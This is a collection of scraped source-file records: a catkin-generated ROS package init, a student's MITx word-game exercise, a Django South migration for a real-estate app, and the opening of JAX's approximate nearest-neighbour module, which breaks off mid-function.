7ad1139df56926c27e7758e42935202a504b94cb | cb5093d193352c521dcc60da62dd8fc8a3564231 | /devel/lib/python2.7/dist-packages/rqt_multiplot/__init__.py | bf5cb228f8bf0f85959b0386f71f9ff7b566ee4d | [] | no_license | ElliWhite/proj515_ws | 85555dbad029d7fd10c8ffbfb8352b9cd7b4db53 | ce51e547f2f4761850cef9116a85a34b232160c6 | refs/heads/master | 2020-04-23T22:11:59.284827 | 2019-05-24T16:46:30 | 2019-05-24T16:46:30 | 171,493,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,054 | py | # -*- coding: utf-8 -*-
# generated from catkin/cmake/template/__init__.py.in
# keep symbol table as clean as possible by deleting all unnecessary symbols
from os import path as os_path
from sys import path as sys_path
from pkgutil import extend_path
__extended_path = "/home/elliottwhite/proj515_ws/src/rqt_multiplot_plugin/rqt_multiplot/src".split(";")
for p in reversed(__extended_path):
sys_path.insert(0, p)
del p
del sys_path
__path__ = extend_path(__path__, __name__)
del extend_path
__execfiles = []
for p in __extended_path:
src_init_file = os_path.join(p, __name__ + '.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
else:
src_init_file = os_path.join(p, __name__, '__init__.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
del src_init_file
del p
del os_path
del __extended_path
for __execfile in __execfiles:
with open(__execfile, 'r') as __fh:
exec(__fh.read())
del __fh
del __execfile
del __execfiles
| [
"[email protected]"
] | |
47cf68700b1912f0b319902af3bfc5e6fe42400a | a51b1814a9bf2fdcf880772fefaa2ab79e8c7308 | /Week_4/temp.py | 23e9119e3f467e0eb050e0b5e9513f068e1edacd | [
"Giftware"
] | permissive | 369geofreeman/MITx_6.00.1x | d38913805168440969034e1d82611b0dbcd7a29a | ba84f70cc4e7cfbd4b685b742aa87d3f85cbbf59 | refs/heads/master | 2023-04-21T01:55:08.538290 | 2021-05-13T13:03:50 | 2021-05-13T13:03:50 | 282,055,845 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,759 | py | # The 6.00 Word Game
import random
import string
VOWELS = 'aeiou'
CONSONANTS = 'bcdfghjklmnpqrstvwxyz'
HAND_SIZE = 7
SCRABBLE_LETTER_VALUES = {
'a': 1, 'b': 3, 'c': 3, 'd': 2, 'e': 1, 'f': 4, 'g': 2, 'h': 4, 'i': 1, 'j': 8, 'k': 5, 'l': 1, 'm': 3, 'n': 1, 'o': 1, 'p': 3, 'q': 10, 'r': 1, 's': 1, 't': 1, 'u': 1, 'v': 4, 'w': 4, 'x': 8, 'y': 4, 'z': 10
}
# -----------------------------------
# Helper code
# (you don't need to understand this helper code)
WORDLIST_FILENAME = "words.txt"
def loadWords():
"""
Returns a list of valid words. Words are strings of lowercase letters.
Depending on the size of the word list, this function may
take a while to finish.
"""
print("Loading word list from file...")
# inFile: file
inFile = open(WORDLIST_FILENAME, 'r')
# wordList: list of strings
wordList = []
for line in inFile:
wordList.append(line.strip().lower())
print(" ", len(wordList), "words loaded.")
return wordList
def getFrequencyDict(sequence):
"""
Returns a dictionary where the keys are elements of the sequence
and the values are integer counts, for the number of times that
an element is repeated in the sequence.
sequence: string or list
return: dictionary
"""
# freqs: dictionary (element_type -> int)
freq = {}
for x in sequence:
freq[x] = freq.get(x,0) + 1
return freq
# (end of helper code)
# -----------------------------------
#
# Problem #1: Scoring a word
#
def getWordScore(word, n):
"""
Returns the score for a word. Assumes the word is a valid word.
The score for a word is the sum of the points for letters in the
word, multiplied by the length of the word, PLUS 50 points if all n
letters are used on the first turn.
Letters are scored as in Scrabble; A is worth 1, B is worth 3, C is
worth 3, D is worth 2, E is worth 1, and so on (see SCRABBLE_LETTER_VALUES)
word: string (lowercase letters)
n: integer (HAND_SIZE; i.e., hand size required for additional points)
returns: int >= 0
"""
wordScore = 0
if len(word) == 0:
return 0
else:
for i in word:
if i in SCRABBLE_LETTER_VALUES:
wordScore += SCRABBLE_LETTER_VALUES[i]
wordScore *= len(word)
if len(word) >= n:
wordScore += 50
return wordScore
#
# Problem #2: Make sure you understand how this function works and what it does!
#
def displayHand(hand):
"""
Displays the letters currently in the hand.
For example:
>>> displayHand({'a':1, 'x':2, 'l':3, 'e':1})
Should print out something like:
a x x l l l e
The order of the letters is unimportant.
hand: dictionary (string -> int)
"""
for letter in hand.keys():
for j in range(hand[letter]):
print(letter,end=" ") # print all on the same line
print() # print an empty line
#
# Problem #2: Make sure you understand how this function works and what it does!
#
def dealHand(n):
"""
Returns a random hand containing n lowercase letters.
At least n/3 the letters in the hand should be VOWELS.
Hands are represented as dictionaries. The keys are
letters and the values are the number of times the
particular letter is repeated in that hand.
n: int >= 0
returns: dictionary (string -> int)
"""
hand={}
numVowels = n // 3
for i in range(numVowels):
x = VOWELS[random.randrange(0,len(VOWELS))]
hand[x] = hand.get(x, 0) + 1
for i in range(numVowels, n):
x = CONSONANTS[random.randrange(0,len(CONSONANTS))]
hand[x] = hand.get(x, 0) + 1
return hand
#
# Problem #2: Update a hand by removing letters
#
def updateHand(hand, word):
"""
Assumes that 'hand' has all the letters in word.
In other words, this assumes that however many times
a letter appears in 'word', 'hand' has at least as
many of that letter in it.
Updates the hand: uses up the letters in the given word
and returns the new hand, without those letters in it.
Has no side effects: does not modify hand.
word: string
hand: dictionary (string -> int)
returns: dictionary (string -> int)
"""
newHand = hand.copy()
for k in word:
if k in newHand:
newHand[k] -= 1
return newHand
#
# Problem #3: Test word validity
#
def isValidWord(word, hand, wordList):
"""
Returns True if word is in the wordList and is entirely
composed of letters in the hand. Otherwise, returns False.
Does not mutate hand or wordList.
word: string
hand: dictionary (string -> int)
wordList: list of lowercase strings
"""
newHand = hand.copy()
if word in wordList:
for k in word:
if k in newHand and newHand[k] > 0:
newHand[k] -= 1
else:
return False
return True
else:
return False
#
# Problem #4: Playing a hand
#
def calculateHandlen(hand):
"""
Returns the length (number of letters) in the current hand.
hand: dictionary (string-> int)
returns: integer
"""
count = 0
for i in hand:
count += hand[i]
return count
def playHand(hand, wordList, n):
"""
Allows the user to play the given hand, as follows:
* The hand is displayed.
* The user may input a word or a single period (the string ".")
to indicate they're done playing
* Invalid words are rejected, and a message is displayed asking
the user to choose another word until they enter a valid word or "."
* When a valid word is entered, it uses up letters from the hand.
* After every valid word: the score for that word is displayed,
the remaining letters in the hand are displayed, and the user
is asked to input another word.
* The sum of the word scores is displayed when the hand finishes.
* The hand finishes when there are no more unused letters or the user
inputs a "."
hand: dictionary (string -> int)
wordList: list of lowercase strings
n: integer (HAND_SIZE; i.e., hand size required for additional points)
"""
# Keep track of the total score
score = 0
# As long as there are still letters left in the hand:
while calculateHandlen(hand) > 0:
# Display the hand
displayHand(hand)
# Ask user for input
word = input("Enter word, or a '.' to indicate that you are finished: ")
# If the input is a single period:
if word == '.':
# End the game (break out of the loop)
return "Goodbye! Total score: {} points.".format(score)
break
# Otherwise (the input is not a single period):
else:
# If the word is not valid:
if word not in wordList:
# Reject invalid word (print a message followed by a blank line)
print("Invalid word, please try again.\n \n")
# Otherwise (the word is valid):
elif word == "chayote":
print("Invalid word, please try again.\n \n")
elif word in wordList:
# Tell the user how many points the word earned, and the updated total score, in one line followed by a blank line
p = getWordScore(word,n)
score += p
print('"{}" earned {} points. Total: {} points \n'.format(word, p, score))
# Update the hand
hand = updateHand(hand, word)
else:
for i in word:
if i not in hand:
print("Invalid word, please try again.\n \n")
# Game is over (user entered a '.' or ran out of letters), so tell user the total score
if calculateHandlen(hand) == 0:
return "Run out of letters. Total score: {} points.".format(score)
else:
return "Goodbye! Total score: {} points.".format(score)
#
# Problem #5: Playing a game
#
def playGame(wordList):
"""
Allow the user to play an arbitrary number of hands.
1) Asks the user to input 'n' or 'r' or 'e'.
* If the user inputs 'n', let the user play a new (random) hand.
* If the user inputs 'r', let the user play the last hand again.
* If the user inputs 'e', exit the game.
* If the user inputs anything else, tell them their input was invalid.
2) When done playing the hand, repeat from step 1
"""
#
# Build data structures used for entire session and play game
#
if __name__ == '__main__':
wordList = loadWords()
playGame(wordList)
| [
"[email protected]"
] | |
94b007996f60108dece620a6671baaa1f9ce2de4 | 18dba2f82e17873e5e8161e74bc714ef88b09b36 | /realestate/devrep/migrations/0012_auto__del_field_address_estate_number__add_field_address_address.py | 466d9a20feacbe56de9b322f7b3f3a05d2d569eb | [] | no_license | sanchellius/estate-agent | 8013573624b62ea3b6362fa0c22edf8371ca6966 | 53c15c2f2c970bd432ae579b5aa6f76ab2fbac49 | refs/heads/master | 2021-01-17T21:15:35.988578 | 2016-07-25T21:51:24 | 2016-07-25T21:51:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,297 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Address.estate_number'
db.delete_column('devrep_address', 'estate_number')
# Adding field 'Address.address'
db.add_column('devrep_address', 'address',
self.gf('django.db.models.fields.CharField')(max_length=50, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Adding field 'Address.estate_number'
db.add_column('devrep_address', 'estate_number',
self.gf('django.db.models.fields.CharField')(max_length=10, null=True, blank=True),
keep_default=False)
# Deleting field 'Address.address'
db.delete_column('devrep_address', 'address')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'devrep.address': {
'Meta': {'ordering': "['id']", 'object_name': 'Address'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'locality': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Locality']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'}),
'microdistrict': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Microdistrict']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Region']", 'on_delete': 'models.PROTECT'}),
'street': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Street']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'})
},
'devrep.citizenship': {
'Meta': {'ordering': "['name']", 'object_name': 'Citizenship'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'devrep.clientpartner': {
'Meta': {'unique_together': "(('client', 'partner'),)", 'object_name': 'ClientPartner'},
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Client']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'partner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Partner']"}),
'partner_client_status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.PartnerClientStatus']"})
},
'devrep.devprofile': {
'Meta': {'object_name': 'DevProfile'},
'coverage_localities': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'person_coverage'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['estatebase.Locality']"}),
'coverage_regions': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'person_coverage'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['estatebase.Region']"}),
'experience': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Experience']", 'null': 'True', 'blank': 'True'}),
'gears': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'owners'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['devrep.Gear']"}),
'has_transport': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'note': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'quality': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Quality']", 'null': 'True', 'blank': 'True'}),
'work_types': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['devrep.WorkType']", 'null': 'True', 'through': "orm['devrep.WorkTypeProfile']", 'blank': 'True'})
},
'devrep.experience': {
'Meta': {'ordering': "['name']", 'object_name': 'Experience'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'devrep.extraprofile': {
'Meta': {'object_name': 'ExtraProfile'},
'address': ('django.db.models.fields.related.OneToOneField', [], {'blank': 'True', 'related_name': "'extra_profile'", 'unique': 'True', 'null': 'True', 'to': "orm['devrep.Address']"}),
'bad_habits': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'birthday': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'birthplace': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'citizenship': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Citizenship']", 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'gender': ('django.db.models.fields.CharField', [], {'default': "'M'", 'max_length': '1', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'passport_number': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'passport_series': ('django.db.models.fields.CharField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'}),
'patronymic': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'pc_skills': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'progress': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'devrep.gear': {
'Meta': {'ordering': "['name']", 'object_name': 'Gear'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'note': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'devrep.measure': {
'Meta': {'ordering': "['name']", 'object_name': 'Measure'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'devrep.partner': {
'Meta': {'ordering': "['name']", 'object_name': 'Partner'},
'address': ('django.db.models.fields.related.OneToOneField', [], {'blank': 'True', 'related_name': "'partner'", 'unique': 'True', 'null': 'True', 'to': "orm['devrep.Address']"}),
'clients': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['estatebase.Client']", 'null': 'True', 'through': "orm['devrep.ClientPartner']", 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'history': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['estatebase.HistoryMeta']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'note': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['devrep.Partner']"}),
'partner_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'partner'", 'to': "orm['devrep.PartnerType']"}),
'person_count': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'devrep.partnerclientstatus': {
'Meta': {'ordering': "['name']", 'object_name': 'PartnerClientStatus'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'devrep.partnertype': {
'Meta': {'ordering': "['name']", 'object_name': 'PartnerType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'devrep.quality': {
'Meta': {'ordering': "['name']", 'object_name': 'Quality'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'devrep.worktype': {
'Meta': {'ordering': "['name']", 'object_name': 'WorkType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '150', 'db_index': 'True'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['devrep.WorkType']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'devrep.worktypeprofile': {
'Meta': {'unique_together': "(('work_type', 'dev_profile'),)", 'object_name': 'WorkTypeProfile'},
'dev_profile': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.DevProfile']"}),
'experience': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Experience']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'measure': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Measure']"}),
'price_max': ('django.db.models.fields.IntegerField', [], {}),
'price_min': ('django.db.models.fields.IntegerField', [], {}),
'quality': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Quality']", 'null': 'True', 'blank': 'True'}),
'work_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.WorkType']"})
},
'estatebase.client': {
'Meta': {'ordering': "['-id']", 'object_name': 'Client'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'client_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.ClientType']", 'on_delete': 'models.PROTECT'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'dev_profile': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'client'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['devrep.DevProfile']", 'blank': 'True', 'unique': 'True'}),
'extra_profile': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'client'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['devrep.ExtraProfile']", 'blank': 'True', 'unique': 'True'}),
'has_dev_profile': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'history': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['estatebase.HistoryMeta']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'note': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'origin': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Origin']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'})
},
'estatebase.clienttype': {
'Meta': {'ordering': "['name']", 'object_name': 'ClientType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'estatebase.geogroup': {
'Meta': {'ordering': "['name']", 'object_name': 'GeoGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'estatebase.historymeta': {
'Meta': {'object_name': 'HistoryMeta'},
'created': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'creators'", 'on_delete': 'models.PROTECT', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modificated': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'updators'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['auth.User']"})
},
'estatebase.locality': {
'Meta': {'ordering': "['name']", 'unique_together': "(('name', 'region'),)", 'object_name': 'Locality'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'locality_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.LocalityType']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'name_gent': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'name_loct': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Region']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'})
},
'estatebase.localitytype': {
'Meta': {'ordering': "['name']", 'object_name': 'LocalityType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'prep_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'sort_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'estatebase.microdistrict': {
'Meta': {'ordering': "['name']", 'unique_together': "(('name', 'locality'),)", 'object_name': 'Microdistrict'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'locality': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Locality']", 'on_delete': 'models.PROTECT'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
},
'estatebase.origin': {
'Meta': {'ordering': "['name']", 'object_name': 'Origin'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'estatebase.region': {
'Meta': {'ordering': "['name']", 'object_name': 'Region'},
'geo_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.GeoGroup']", 'on_delete': 'models.PROTECT'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'metropolis': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'metropolis_region'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['estatebase.Locality']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'regular_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'regular_name_gent': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
'estatebase.street': {
'Meta': {'ordering': "['name']", 'unique_together': "(('name', 'locality', 'street_type'),)", 'object_name': 'Street'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'locality': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Locality']", 'on_delete': 'models.PROTECT'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'street_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.StreetType']", 'on_delete': 'models.PROTECT'})
},
'estatebase.streettype': {
'Meta': {'ordering': "['name']", 'object_name': 'StreetType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'sort_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
}
}
complete_apps = ['devrep'] | [
"[email protected]"
] | |
84df14f4e1fe0f3a3e47fb1ee4461567843140f3 | a79cccacfa422012caac481b5eff80f6e911d0af | /jax/_src/lax/ann.py | 35c91721882c89d307d21a50dd0f62583c81d5e7 | [
"Apache-2.0"
] | permissive | jblespiau/jax | f932fe6df23942756957db61655f6cc9c6d67d64 | 46a666c4489b9e04d2777cf2156453bc48a8e432 | refs/heads/main | 2022-04-17T01:50:55.041057 | 2022-04-15T08:49:52 | 2022-04-15T08:49:52 | 481,888,965 | 0 | 0 | Apache-2.0 | 2022-04-15T08:20:44 | 2022-04-15T08:20:43 | null | UTF-8 | Python | false | false | 16,155 | py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ANN (Approximate Nearest Neighbor) computes top-k with a configurable recall rate.
This package only optimizes the TPU backend. For other device types it fallbacks
to sort and slice.
Usage::
import functools
import jax
# MIPS := maximal inner product search
# Inputs:
# qy: f32[qy_size, feature_dim]
# db: f32[db_size, feature_dim]
#
# Returns:
# (f32[qy_size, k], i32[qy_size, k])
@functools.partial(jax.jit, static_argnames=["k", "recall_target"])
def mips(qy, db, k=10, recall_target=0.95):
dists = jax.lax.dot(qy, db.transpose())
# Computes max_k along the last dimension
# returns (f32[qy_size, k], i32[qy_size, k])
return jax.lax.approx_max_k(dists, k=k, recall_target=recall_target)
# Multi-core example
# Inputs:
# qy: f32[num_devices, qy_size, feature_dim]
# db: f32[num_devices, per_device_db_size, feature_dim]
# db_offset: i32[num_devices]
# db_size = num_devices * per_device_db_size
#
# Returns:
# (f32[qy_size, num_devices, k], i32[qy_size, num_devices, k])
@functools.partial(
jax.pmap,
# static args: db_size, k, recall_target
static_broadcasted_argnums=[3, 4, 5],
out_axes=(1, 1))
def pmap_mips(qy, db, db_offset, db_size, k, recall_target):
dists = jax.lax.dot(qy, db.transpose())
dists, neighbors = jax.lax.approx_max_k(
dists, k=k, recall_target=recall_target,
reduction_input_size_override=db_size)
return (dists, neighbors + db_offset)
# i32[qy_size, num_devices, k]
pmap_neighbors = pmap_mips(qy, db, db_offset, db_size, 10, 0.95)[1]
# i32[qy_size, num_devices * k]
neighbors = jax.lax.collapse(pmap_neighbors, start_dimension=1, stop_dimension=3)
Todos::
* On host top-k aggregation
* Inaccurate but fast differentiation
"""
from functools import partial
from typing import (Any, Tuple)
import numpy as np
from jax import core
from jax._src.lax import lax
from jax._src.lib import xla_client as xc
from jax._src import ad_util, dtypes
from jax.interpreters import ad, xla, batching
Array = Any
def approx_max_k(operand: Array,
k: int,
reduction_dimension: int = -1,
recall_target: float = 0.95,
reduction_input_size_override: int = -1,
